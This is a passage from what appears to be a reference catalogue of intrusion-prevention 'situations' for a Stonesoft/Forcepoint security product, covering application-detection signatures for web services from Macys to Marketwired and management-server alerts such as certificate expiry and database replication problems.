First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Macys is a mid-range chain of department stores owned by American corporation Macys, Inc.
Back to top

Mad-Mimi

About this situation: Application Mad-Mimi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mad Mimi is an email marketing service that allows users to create, send and track email campaigns.
Back to top

Madison-Logic

About this situation: Madison Logic usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-623-5211
Last changed: sgpkg-ips-1237-5242
Description: Madison Logic is a Business-To-Business (B2B) ad targeting company.
Back to top

Madthumbs

About this situation: Madthumbs usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-521-5211
Last changed: sgpkg-ips-628-5211
Description: Madthumbs is an adult video streaming service.
Back to top

Maestro.fm

About this situation: Application Maestro.fm detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Maestro is a cloud music platform enabling users to access and manage their entire music library on demand from any connected device
Back to top

MageCloud

About this situation: Application MageCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MageCloud is a PaaS product that helps store owners and Magento developers launch Magento stores by installing themes, extensions and deploying into the cloud hosting infrastructure.
Back to top

Magento

About this situation: Application Magento detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Magento provides ecommerce software solutions and platform for online businesses.
Back to top

Magic-Software-Enterprises

About this situation: Application Magic-Software-Enterprises detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Magic Software Enterprises is a global provider of software platforms for enterprise mobility, cloud applications, and business integration.
Back to top

Magicbackup

About this situation: Application Magicbackup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Magicbackup - provides online computer data storage for SOHO and SMB customers.
Back to top

Magisto

About this situation: Application Magisto detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Magisto is ultimate video editor.
Back to top

Magix

About this situation: Application Magix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MAGIX is an international provider of software, online services and digital content for multimedia communications.
Back to top

Magnetic-North

About this situation: Application Magnetic-North detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Magnetic North - call centre software, Contact Centre Solutions and Cloud Communications.
Back to top

Mahalo

About this situation: Application Mahalo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mahalo.com is a destination learning site where visitors can 'Learn Anything'
Back to top

Mahara

About this situation: Application Mahara detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mahara is an open source ePortfolio and social networking web application.
Back to top

Mail-Online

About this situation: Mail Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-630-5211
Description: Mail Online is the online version of the British newspaper Daily Mail.
Back to top

Mail-Riseup

About this situation: Application Mail-Riseup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Riseup provides secure and private email accounts, accessible via the web, shell, IMAP, or POP.
Back to top

Mail.com

About this situation: Mail.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: A Web-based Email service that allows users to send and receive emails through the web service with only a web browser.
Back to top

mail.ru

About this situation: mail.ru usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-467-5211
Last changed: sgpkg-ips-769-5211
Description: mail.ru is the largest free e-mail service for Russian-speaking Internet users.
Back to top

Mailbox-Forwarding

About this situation: Application Mailbox-Forwarding detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mailbox Forwarding scans your mail for you to view online. Remote mailbox rental service allows you to manage, scan, and forward all of your postal mail online.
Back to top

Mailbox.org

About this situation: Application Mailbox.org detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mailbox.org is an email provider with encryption, spam and virus protection.
Back to top

Mailchimp

About this situation: MailChimp usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: It is a web-based application, although data can be downloaded and for some features there is an offline application.
Back to top

Mailer-Lite

About this situation: Application Mailer-Lite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mailer Lite is an Email Marketing Software for Small Business. Flexible Design and Content editor, Customer Support.
Back to top

Mailgun

About this situation: Application Mailgun detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mailgun provides web-service APIs for fully managed, scalable email servers.
Back to top

Mailjet

About this situation: Application Mailjet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mailjet is a provider of Cloud Emailing. Create, send and track marketing and transactional emails.
Back to top

Mailprotector

About this situation: Application Mailprotector detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mailprotector provides reseller-focused Cloud-based email security, management and hosting services sold through the channel to businesses, government entities and non-profits around the globe.
Back to top

Main-Sequence-Technologies

About this situation: Application Main-Sequence-Technologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Main Sequence Technologies provides PCRecruiter branded recruitment database solutions across economic functions and business models. Its solutions offers configuration and interface.
Back to top

Maindec

About this situation: Application Maindec detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Maindec Computer Solutions Ltd provide Multi-Vendor IT Support company who have been providing IT Service and Solutions UK Wide.
Back to top

Maintenance contract expires soon

About this situation: Maintenance contract expires soon
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1643-5242
Description:
Back to top

Maintenix

About this situation: Application Maintenix detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mxi Technologies provides integrated, intelligent aviation maintenance management software that offers users meaningful improvements in labor productivity.
Back to top

Majesco

About this situation: Application Majesco detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Majesco is a insurance solutions and services provider. Majesco's software for core insurance functions include Policy Administration, Underwriting, New Business Processing, Billing, Claims, Product Modeling, Incentive Compensation and Producer Lifecycle Management. Additionally Majesco offers consulting and insurance specific IT services for testing, data conversion, data-warehousing
Back to top

MakingFun-DominionOnline

About this situation: Dominion Online usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-774-5211
Description: Dominion Online usage was detected. Dominion Online is an online version of the Dominion board game.
Back to top

Malicious Embedded iFrame

About this situation: Sites infected with a malicious iframe.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites infected with a malicious iframe.
Back to top

Malicious Embedded Link

About this situation: Sites infected with a malicious link.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites infected with a malicious link.
Back to top

Malicious Websites

About this situation: Sites containing code that may intentionally modify users' systems without their consent and cause harm.
Context: URL Application Context
Severity: 1
Tags: Security, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites containing code that may intentionally modify users' systems without their consent and cause harm.
Back to top

Mals-Ecommerce

About this situation: Mals Ecommerce usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Mal's e-commerce help people sell things on their website and make it easy to hook into third-party payment processors.
Back to top

Malwarebytes-Antimalware-Update

About this situation: Malwarebytes Antimalware Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1277-5242
Description: Update service for Malwarebytes Antimalware products.
Back to top

ManageBac

About this situation: Application ManageBac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ManageBac is online learning platform for IB world schools. ManageBac enables efficient curriculum planning, assessment and reporting, while eliminating paperwork and enhancing communication to parents and students.
Back to top

ManagedMethods

About this situation: Application ManagedMethods detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ManagedMethods Cloud Access Monitor lets businesses secure data in apps and gain visibility into how users store, access and share files in the cloud.
Back to top

ManagedVoice-Connect

About this situation: Application ManagedVoice-Connect detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Managed Voice hosted telephony solution allows you to make use of a state-of-the-art telephone switchboard and facilities, hosted by Voiceworks at a secure central location.
Back to top

ManageEngine

About this situation: Application ManageEngine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ManageEngine offers enterprise IT management software, including network management, server, desktop and application management.
Back to top

Management Server database replication approaching system failure.

About this situation: Unsuccessful Management Server database replication approaching limit for system failure.
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1151-5242
Description: Management Server database replication to one or more additional Management Servers has been unsuccessful and is approaching the limit for system failure. If any additional Management Servers are stopped or unreachable, start the Additional Management Servers or exclude them from replication. If replication to all additional Management Servers is unsuccessful, manually synchronize the databases between the active Management Server and the additional Management Servers.
Back to top

Management Server database replication issue.

About this situation: Management Server database replication not working as expected.
Context: Management Server situation
Severity: 6
Tags: SMC
First detected in: sgpkg-ips-1151-5242
Last changed: sgpkg-ips-1151-5242
Description: Management Server database replication is not working as expected. If any additional Management Servers are stopped or unreachable, start the Additional Management Servers or exclude them from replication. If replication to all additional Management Servers is unsuccessful, manually synchronize the databases between the active Management Server and the additional Management Servers.
Back to top

Management Server restarted on system resource failure.

About this situation: Management Server restarted after system resource failure
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-1296-5242
Last changed: sgpkg-ips-1297-5242
Description: Management Server has been restarted after a fatal failure on system resource.
Back to top

Management Server: Certificate Authority renewal started

About this situation: Management Server: Certificate Authority renewal started
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: Management Server: Certificate Authority renewal has started
Back to top

Management Server: Certificate CA check for engine

About this situation: Management Server: Certificate CA check for engine
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Description: The engine's certificate is signed by an invalid or unknown Certificate Authority. Run the sg-reconfigure script on the engine to create a new certificate.
Back to top

Management Server: Certificate CA check for Log Server

About this situation: Management Server: Certificate CA check for Log Server
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Description: Log Server's certificate is signed by an invalid or unknown Certificate Authority. Run the sgCertifyLogSrv script on the Log Server to create a new certificate.
Back to top

Management Server: Certificate CA check for Management Server

About this situation: Management Server: Certificate CA check for Management Server
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Description: Management Server's certificate is signed by an invalid or unknown Certificate Authority. Run the sgCertifyMgtSrv script on the Management Server to create a new certificate.
Back to top

Management Server: Certificate CA check for Web Portal Server

About this situation: Management Server: Certificate CA check for Web Portal Server
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Description: Web Portal Server's certificate is signed by an invalid or unknown Certificate Authority. Run the sgCertifyWebPortalSrv script on the Web Portal Server to create a new certificate.
Back to top

Management Server: Certificate check for engine

About this situation: Management Server: Certificate check for engine
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-1296-5242
Description: The engine certificate expires in less than 90 days. Run the sg-reconfigure script on the engine to create a new certificate by doing a new initial contact to the management server.
Back to top

Management Server: Certificate check for Log Server

About this situation: Management Server: Certificate check for Log Server
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-1296-5242
Description: Log Server's certificate expires in less than 90 days. Run the sgCertifyLogSrv script on the Log Server to create a new certificate.
Back to top

Management Server: Certificate check for Management Server

About this situation: Management Server: Certificate check for Management Server
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Management Server's certificate expires in less than 90 days. Run the sgCertifyMgtSrv script on the Management Server to create a new certificate.
Back to top

Management Server: Certificate check for Web Portal Server

About this situation: Management Server: Certificate check for Web Portal Server
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-1296-5242
Description: Web Portal Server's certificate expires in less than 90 days. Run the sgCertifyWebPortalSrv script on the Web Portal Server to create a new certificate.
Back to top

Management Server: Certificate generated after last known

About this situation: Management Server: Certificate generated after last known
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-218-3038
Description: Management Server checks its generated certificates and used ones and warns for information. Certificate used was generated after the last known certification from this CA.
Back to top

Management Server: Certificate not found

About this situation: Management Server: Certificate not found
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-218-3038
Description: Management Server checks its generated certificates and used ones and warns for information. Certificate used was not found in stored list of certificates generated by this CA.
Back to top

Management Server: Certificate not the last generated

About this situation: Management Server: Certificate not the last generated
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-218-3038
Description: Management Server checks its generated certificates and used ones and warns for information. Certificate used is not the last generated.
Back to top

Management Server: db connection full

About this situation: Management Server: no more available db connections
Context: Management Server situation
Severity: 10
Tags: SMC
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1184-5242
Description: One of a DB connection pool is full. The system is waiting a new one. The Management Server can become very slow.
Back to top

Management Server: db sequence almost full

About this situation: Management Server: a DB sequence is almost full.
Context: Management Server situation
Severity: 10
Tags: SMC
First detected in: sgpkg-ips-1184-5242
Last changed: sgpkg-ips-1184-5242
Description: One of a DB sequence is almost full. Please contact the support.
Back to top

Management Server: disk full

About this situation: Management Server: disk full
Context: Log Server situations
Severity: 10
Tags: SMC
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-106-2032
Description: The disk space on the Management Server has dropped below the threshold value set in the Management Server configuration file. Free up space on the Management Server immediately.
Back to top

Management Server: Engine Upgrade(s) available

About this situation: Management Server: Engine Upgrade(s) available
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description:
Back to top

Management Server: Login failed

About this situation: Management Server: Login failed
Context: Management Server situation
Severity: 4
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Someone has tried to login with the Management Client, but the username and password did not match.
Back to top

Management Server: SMC API DoS

About this situation: Management Server: SMC API DoS situation detected
Context: Management Server situation
Severity: 10
Tags: SMC
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1263-5242
Description: A situation of deny of service on the SMC API web application has been detected. The Management Server can become very slow.
Back to top

Management Server: Stonesoft Management Center Upgrade available

About this situation: Management Server: Stonesoft Management Center Upgrade available
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-218-3038
Description:
Back to top

Management Server: Update available

About this situation: Management Server: Update(s) available
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description:
Back to top

Management Server: Update package activated

About this situation: Management Server: Update package activated
Context: Management Server situation
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1296-5242
Description: Update package activation succeeded.
Back to top

Management Server: Update package activation failed

About this situation: Management Server: Update package activation failed
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Update package activation failed. This happens on rare circumstances. Please restore the backup performed before update package activation and contact the support.
Back to top

Management Server: Update server not available

About this situation: Management Server: Update server not available
Context: Management Server situation
Severity: 3
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Stonesoft server is not responding, new updates may possibly be available but the software was not able to verify. Please try to check manually on Stonesoft web site.
Back to top

Management-Innovation-eXchange

About this situation: Application Management-Innovation-eXchange detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The MIX helps to accelerate the pace of management innovation by energizing and organizing the conversation around the most critical challenges facing managers today - and by providing a practical platform where they can document,share and develop their leading-edge ideas and practices.
Back to top

Managerzone

About this situation: ManagerZone usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

Mandrill

About this situation: Application Mandrill detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mandrill is a transactional email platform. it helps to send automated email like password resets and welcome messages, marketing emails and customized newsletters.
Back to top

Mango

About this situation: Application Mango detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mango is a software solution for health and safety, quality, food safety and environmental management.
Back to top

Mango-map

About this situation: Application Mango-map detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mango map - transform geospatial data into compelling interactive web maps.
Back to top

Mango-Signs

About this situation: Application Mango-Signs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mango Signs provides digital signage for small businesses that can be run on almost any device and be managed from anywhere.
Back to top

Mangoapps

About this situation: MangoApps usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-629-5211
Description: This service provides applications for enterprise communication, collaboration, and file sharing. Source: Wikipedia
Back to top

Manh

About this situation: Application Manh detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Manhattan Associates have earned a reputation for building technology solutions that solve the most complex business problems in supply chain, inventory and now omni-channel.
Back to top

Manoto

About this situation: Manoto usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-859-5242
Last changed: sgpkg-ips-1873-5242
Description: Manoto is a Persial language free entertainment channel.
Back to top

Manta

About this situation: Application Manta detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Manta is an online community for small businesses, facilitating connections and promotional activities.
Back to top

Manulife

About this situation: Application Manulife detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Manulife is a financial services group with principal operations in Asia, Canada and the United States.
Back to top

Map-Business-Online

About this situation: Application Map-Business-Online detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Map Business Online is a business mapping software that both large and small businesses can affordably incorporate into their business workflows.
Back to top

Mapbox

About this situation: Application Mapbox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mapbox is a provider of custom online maps for websites such as Foursquare, Pinterest, Evernote, the Financial Times and Uber Technologies.
Back to top

Mapistry

About this situation: Application Mapistry detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mapistry provides mapping tool that helps scientists, civil engineers, and city planners to combine, annotate, and view spatial data using mobile devices or in computer.
Back to top

Maplestory

About this situation: MapleStory usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Web-based Gaming service where users can play games or get gaming information online using a web browser.
Back to top

MapMyFITNESS

About this situation: MapMyFITNESS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-754-5211
Description: MapMyFITNESS provides online gym workouts and workout tracking.
Back to top

MapMyHIKE

About this situation: MapMyHIKE usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-754-5211
Description: MapMyHIKE provides online hiking maps and trails.
Back to top

MapMyRIDE

About this situation: MapMyRIDE usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-754-5211
Description: MapMyRIDE provides online bike maps, cycling workouts and biking routes.
Back to top

MapMyRUN

About this situation: MapMyRUN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-754-5211
Description: MapMyRUN provides running maps and a running route planner.
Back to top

MapMyTRI

About this situation: MapMyTRI usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-754-5211
Description: MapMyTRI provides an online triathlon training tool.
Back to top

MapMyWALK

About this situation: MapMyWALK usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-754-5211
Description: MapMyWALK provides walking maps and a walking route planner.
Back to top

Mapply

About this situation: Application Mapply detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Mapply - simple app that allows to easily embed a Store or Dealer Locator tool on website.
Back to top

Mapquest

About this situation: MapQuest usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: MapQuest provides some extent of street-level detail and/or driving directions for a variety of countries. MapQuest Mobile is a service providing maps and driving directions to any Web-enabled mobile phone or personal digital assistant.Source: Wikipedia
Back to top

MarcomCentral

About this situation: Application MarcomCentral detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MarcomCentral empowers your sales team, partners, and other authorized individuals to produce custom marketing pieces using corporate approved templates. The portal keeps teams across your organization on-brand, on-budget and on-time.
Back to top

MariaDB

About this situation: Application MariaDB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MariaDB open source database started by the founders of MySQL. Enterprise database security, modern architecture and wildly popular open source.
Back to top

Marijuana

About this situation: Sites that provide information about or promote the cultivation, preparation or use of marijuana.
Context: URL Application Context
Severity: 1
Tags: Drugs, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about or promote the cultivation, preparation or use of marijuana.
Back to top

Marin-Software

About this situation: Application Marin-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Marin Software provides online advertising management solutions, offering an integrated platform for managing search (SEM), display, and social marketing.
Back to top

MARKDOWN-GURU

About this situation: Application MARKDOWN-GURU detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Markdown Guru allows eBay Store Owners to create a sale in minutes by locating the right items suitable for a sale and monitoring their performance.
Back to top

Market-Dialer

About this situation: Application Market-Dialer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SafeSoft Solutions offers cloud based call center software. Includes VoIP and auto dialer software.
Back to top

Marketing-Optimizer

About this situation: Application Marketing-Optimizer detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Marketing Optimizer helps you optimize conversion rates, increase lead-to-close ratio, and resell leads easily. Includes complete WordPress integration.
Back to top

Marketlive

About this situation: Application Marketlive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MarketLive, Inc., provider of eCommerce technology and services that help fast-growing companies successfully sell goods and services online.
Back to top

Marketo

About this situation: Marketo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1764-5242
Description: This software allows users to launch marketing campaigns on multiple channels including email, social media, analytics, lead management, and more. Source: Wikipedia
Back to top

Marketsight

About this situation: Application Marketsight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MarketSight is dedicated to providing powerful and intuitive software solutions for Market Researchers. MarketSight mission is to provide easy-to-use tools that enable researchers and analysts to focus on finding and presenting critical new insights about their business
Back to top

Markettools

About this situation: Application Markettools detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MarketTools, as a part of MetrixLab is the fprovider of online consumer research services. Through the use of advanced respondent engagement techniques, comprehensive analytic tools, and expert knowledge of research science, MarketTools helps clients innovate, optimize and execute programs that deliver high-value business impact.
Back to top

MarketWatch

About this situation: MarketWatch usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-839-5242
Last changed: sgpkg-ips-839-5242
Description: MarketWatch provides the latest financial news.
Back to top

Marketwired

About this situation: Application Marketwired detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
